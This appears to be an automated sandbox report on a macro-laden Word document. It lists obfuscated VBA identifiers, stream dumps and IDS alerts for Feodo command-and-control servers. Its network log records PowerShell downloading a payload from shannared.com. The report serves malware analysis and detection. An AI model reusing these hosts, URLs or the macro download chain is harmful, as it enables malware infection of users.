                                          kRgnIQJCn
                                          SVfwH
                                          rSrZBJJv
                                          zYRcUHEHG
                                          prhgQCFm:
                                          Split(XlUFJHR,
                                          Nothing
                                          Split(sujuoHFCJ,
                                          VcboAE
                                          XpIXCDhMq
                                          ArMYJEkJb:
                                          fEDGCAg
                                          PASRFGECE
                                          PASRFGECE()
                                          ctRAim
                                          jyxYAFLC
                                          QFAdJG:
                                          Array((muQUuJD),
                                          eBzEFGPxh
                                          Split(ctRAim,
                                          vDIdCwGfT
                                          Split(XpIXCDhMq,
                                          PCtZE)
                                          yPcgGA
                                          NYPQCHF
                                          ZDKqIFEBG()
                                          nd:wns
                                          OwqxzJE)
                                          kXidGGmrk
                                          xfQswJFE
                                          Resume
                                          tCOXBDEPL
                                          VHxfT:
                                          OwqxzJE
                                          ortGB
                                          NFoIZAgdj
                                          DunxEHX()
                                          wJdJAI
                                          ifTgDoG)
                                          hxzoFBtLC
                                          HYqcb
                                          Split(fEDGCAg,
                                          PwyZCI
                                          ndgmns
                                          NGzByr
                                          ffeODEi:
                                          PTpduh:
                                          jzCVAIVG
                                          cpeHA
                                          UTlaBhGD:
                                          nEsTCdYDH
                                          Array((huVBjtENv),
                                          ndinns
                                          elqXMZ:
                                          xnvME()
                                          HKXrDBEI
                                          JaknVR
                                          Array((jyxYAFLC),
                                          Mid(skuwd,
                                          Target)
                                          bpMND
                                          LXXQDDfJ
                                          PCtZE
                                          Split(TjMQdBBgE,
                                          AQJEzpnoG:
                                          gvcgAIUM
                                          sOfSqNO
                                          tCOXBDEPL()
                                          MhDEGJ()
                                          NGzByr:
                                          ortGB:
                                          pNdoqWCxt)
                                          SbmMCGuEY
                                          zYRcUHEHG:
                                          IOPMfG()
                                          nvNjhAFA
                                          elqXMZ
                                          Array((DObDSSSH),
                                          Split(NvjyW,
                                          JvTSZI
                                          IkIlHED
                                          ffeODEi
                                          XlUFJHR
                                          DSEaFYQ
                                          AQOwDFGF
                                          UTlaBhGD
                                          UsjaB
                                          ndmns
                                          WiAHIOige:
                                          Attribute
                                          IUHjJ
                                          uZukAmEA()
                                          NYPQCHF)
                                          Split(riWqFGJY,
                                          PmuwJBJH
                                          LpCFBdE
                                          IOPMfG
                                          ndsns
                                          aACrBzCHd()
                                          Array((eGHABDHYI),
                                          huVBjtENv
                                          Array((SbmMCGuEY),
                                          Array((xfQswJFE),
                                          ZDKqIFEBG
                                          DKUOJzi
                                          kWUSef:
                                          cyDODgZgJ
                                          KAAmsFJLa
                                          VB_Name
                                          CNUcG()
                                          wdpnM
                                          Content
                                          Array((dFuMF),
                                          Split(VcboAE,
                                          tWLOCW()
                                          dvuZzGDnA
                                          Split(cpeHA,
                                          Function
                                          xnvME
                                          JtcSFJR
                                          ixJTYF)
                                          Array((IKEyYJ),
                                          VZWOFv()
                                          AQOwDFGF:
                                          oAcbS
                                          tuLCMCI
                                          JvTSZI:
                                          cjdFFEGu
                                          hxzoFBtLC)
                                          rykKLTfBV
                                          HsRXzxA
                                          ndtns
                                          FGWgu
                                          VZWOFv
                                          YtjFBe
                                          nd_ns
                                          dBZlAG)
                                          Array((WzIrJQJ),
                                          Array((zHRlEdEP),
                                          cHCfACCC
                                          Len(skuwd))
                                          ifTgDoG
                                          QFAdJG
                                          Array((SzdUE),
                                          PEoELvIQJ
                                          Array((bpMND),
                                          NFoIZAgdj)
                                          Split(sOfSqNO,
                                          pNdoqWCxt
                                          Split(PmuwJBJH,
                                          ArMYJEkJb
                                          UsjaB)
                                          lhhIDAA
                                          MhDEGJ
                                          zHRlEdEP
                                          muQUuJD
                                          Mid(Application.Name,
                                          Array((jzCVAIVG),
                                          Split(JjJbB,
                                          LnRqcjdHC:
                                          NvjyW
                                          String:
                                          uldHRAc)
                                          PdrYYCtJ
                                          IUHjJ:
                                          otHyDQA()
                                          yPcgGA)
                                          HsRXzxA:
                                          skuwd
                                          dBZlAG
                                          VBA Code
                                          VBA File Name: Zcf1kk3t2ssv4r07m, Stream Size: 704
                                          General
                                          Stream Path:Macros/VBA/Zcf1kk3t2ssv4r07m
                                          VBA File Name:Zcf1kk3t2ssv4r07m
                                          Stream Size:704
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 de 6e eb 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:146
                                          Entropy:4.00187355764
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 304
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:304
                                          Entropy:2.82977037235
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:448
                                          Entropy:3.46647630871
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                          Stream Path: 1Table, File Type: data, Stream Size: 6885
                                          General
                                          Stream Path:1Table
                                          File Type:data
                                          Stream Size:6885
                                          Entropy:6.02650234948
                                          Base64 Encoded:True
                                          Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                          Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520
                                          General
                                          Stream Path:Macros/PROJECT
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:520
                                          Entropy:5.52447471798
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { B 3 1 5 C D 8 3 - A E F A - 4 B 0 A - 9 9 4 6 - 6 3 1 D 4 8 9 C 2 2 F 0 } " . . D o c u m e n t = A 5 a t e 7 3 k c 6 c w 5 n j y / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . . M o d u l e = G u s c a 9 5 l u q _ . . E x e N a m e 3 2 = " J v k 5 9 3 o d o w j q u y o o " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A F A D 4 6 4 D F A F 3 D 1 F 7 D 1 F 7 D 1 F 7 D 1 F 7 "
                                          Data Raw:49 44 3d 22 7b 42 33 31 35 43 44 38 33 2d 41 45 46 41 2d 34 42 30 41 2d 39 39 34 36 2d 36 33 31 44 34 38 39 43 32 32 46 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 0d 0a 4d 6f 64 75 6c 65 3d 47 75 73 63 61 39 35 6c 75 71 5f 0d
                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                          General
                                          Stream Path:Macros/PROJECTwm
                                          File Type:data
                                          Stream Size:143
                                          Entropy:3.86963281051
                                          Base64 Encoded:False
                                          Data ASCII:A 5 a t e 7 3 k c 6 c w 5 n j y . A . 5 . a . t . e . 7 . 3 . k . c . 6 . c . w . 5 . n . j . y . . . Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . Z . c . f . 1 . k . k . 3 . t . 2 . s . s . v . 4 . r . 0 . 7 . m . . . G u s c a 9 5 l u q _ . G . u . s . c . a . 9 . 5 . l . u . q . _ . . . . .
                                          Data Raw:41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 00 41 00 35 00 61 00 74 00 65 00 37 00 33 00 6b 00 63 00 36 00 63 00 77 00 35 00 6e 00 6a 00 79 00 00 00 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 00 5a 00 63 00 66 00 31 00 6b 00 6b 00 33 00 74 00 32 00 73 00 73 00 76 00 34 00 72 00 30 00 37 00 6d 00 00 00 47 75 73 63 61 39 35 6c 75 71 5f 00 47 00 75 00 73 00 63 00 61 00 39
                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4837
                                          General
                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                          File Type:data
                                          Stream Size:4837
                                          Entropy:5.51877025189
                                          Base64 Encoded:True
                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                          Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                          Stream Path: Macros/VBA/dir, File Type: WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435, Stream Size: 628
                                          General
                                          Stream Path:Macros/VBA/dir
                                          File Type:WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435
                                          Stream Size:628
                                          Entropy:6.34127378287
                                          Base64 Encoded:True
                                          Data ASCII:. p . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . Y m . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                          Data Raw:01 70 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 59 6d fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                          Stream Path: WordDocument, File Type: data, Stream Size: 129150
                                          General
                                          Stream Path:WordDocument
                                          File Type:data
                                          Stream Size:129150
                                          Entropy:7.03372694627
                                          Base64 Encoded:True
                                          Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . % . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 25 9b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e f8 01 00 62 7f 00 00 62 7f 00 00 25 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                          Stream Path: office, File Type: data, Stream Size: 796
                                          General
                                          Stream Path:office
                                          File Type:data
                                          Stream Size:796
                                          Entropy:7.73402004362
                                          Base64 Encoded:False
                                          Data ASCII:. ~ . . . . . . 0 . . . . . a . Q . . . . u N . . . . . @ . l . Y . . . . . . . l . . . . . . . , y 0 p . . . . / . . . . . . { . . . . f . . . h . e _ . . . . . Q . . . . + . \\ . [ 3 . . . . . z . . > . H U . t . . P J . { . . ^ . M . . . ^ . . p { r . \\ . . . . . . . . . < . . . . S . . . ! . . 9 ? . . 1 6 9 . . . ` . . G w . . . . . u . . . . . K . . . . P . . . . . . . . . . 1 b . . G . . L . / ) . 9 . - . . n . . . M > . . . . . . . . . . . . . x e | . . N . l & . t . k . . + . . E . # . . I . . . O .
                                          Data Raw:05 7e 92 a5 9d 13 9e 08 30 1e 99 01 10 eb 61 9c 51 88 d9 d2 03 75 4e cf e3 8a 00 be 40 b5 6c 0e 59 06 85 8a f6 95 1f 0e 6c a3 f6 9a 1f e6 d5 ae 2c 79 30 70 e3 b5 a9 8f 2f c2 c1 13 13 df c7 7b b2 8a a8 09 66 d6 a6 bb 68 cb 65 5f 7f b3 af fd b4 51 92 c7 84 fb 2b a3 5c f5 5b 33 d4 0c fa 8c db 7a e8 95 3e cb 48 55 d2 74 07 17 50 4a 10 7b 12 c4 5e c1 4d 00 f7 b6 5e 05 ac 70 7b 72 e7 5c

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          01/27/21-00:10:36.195998TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 234916680192.168.2.2284.232.229.24
                                          01/27/21-00:10:41.493772TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 18491678080192.168.2.2251.255.203.164
                                          01/27/21-00:11:29.811025TCP2404328ET CNC Feodo Tracker Reported CnC Server TCP group 15491698080192.168.2.22217.160.169.110
                                          01/27/21-00:11:38.674494TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 84917180192.168.2.22185.183.16.47

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 27, 2021 00:10:16.314656019 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:16.476891041 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:16.477027893 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:16.480067015 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:16.694104910 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046556950 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046624899 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046668053 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046719074 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046763897 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046821117 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.046843052 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.046880007 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046947956 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.046996117 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.047039986 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.047100067 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.047122002 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.047190905 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.047261953 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.208486080 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208535910 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208565950 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208600044 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.208625078 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.208657026 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208705902 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.208729982 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.208746910 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208802938 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208851099 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208884001 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.208920956 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208969116 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.208990097 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.209033966 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209080935 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209108114 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.209140062 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209183931 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209208012 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.209249973 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209297895 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209316015 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.209351063 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209417105 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.209444046 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209492922 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209539890 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209558964 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.209613085 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.209678888 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.371500969 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.371643066 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.371736050 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.371778965 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.371905088 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.371989965 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.372049093 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.373841047 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.373898983 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.373945951 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.532882929 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.532947063 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.532977104 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533008099 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533046007 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533088923 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533128977 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533180952 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533231974 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.533247948 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.533271074 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533317089 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533355951 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.533411980 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.533420086 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.533499002 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.534883976 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.534943104 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.534984112 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.535026073 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.535057068 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.535074949 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.535118103 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.535164118 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.535202980 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.535243988 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.535264969 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.535273075 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.539453983 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.539515018 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.539557934 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.539585114 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.539629936 CET4916580192.168.2.22192.169.223.13
                                          Jan 27, 2021 00:10:17.539658070 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.694390059 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.694458008 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.694514990 CET8049165192.169.223.13192.168.2.22
                                          Jan 27, 2021 00:10:17.694574118 CET8049165192.169.223.13192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 27, 2021 00:10:16.276245117 CET5219753192.168.2.228.8.8.8
                                          Jan 27, 2021 00:10:16.300174952 CET53521978.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Jan 27, 2021 00:10:16.276245117 CET192.168.2.228.8.8.80x80acStandard query (0)shannared.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Jan 27, 2021 00:10:16.300174952 CET8.8.8.8192.168.2.220x80acNo error (0)shannared.com192.169.223.13A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • shannared.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249165192.169.223.1380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampkBytes transferredDirectionData
                                          Jan 27, 2021 00:10:16.480067015 CET0OUTGET /content/lhALeS/ HTTP/1.1
                                          Host: shannared.com
                                          Connection: Keep-Alive
                                          Jan 27, 2021 00:10:17.046556950 CET1INHTTP/1.1 200 OK
                                          Cache-Control: no-cache, must-revalidate
                                          Pragma: no-cache
                                          Expires: Tue, 26 Jan 2021 23:10:16 GMT
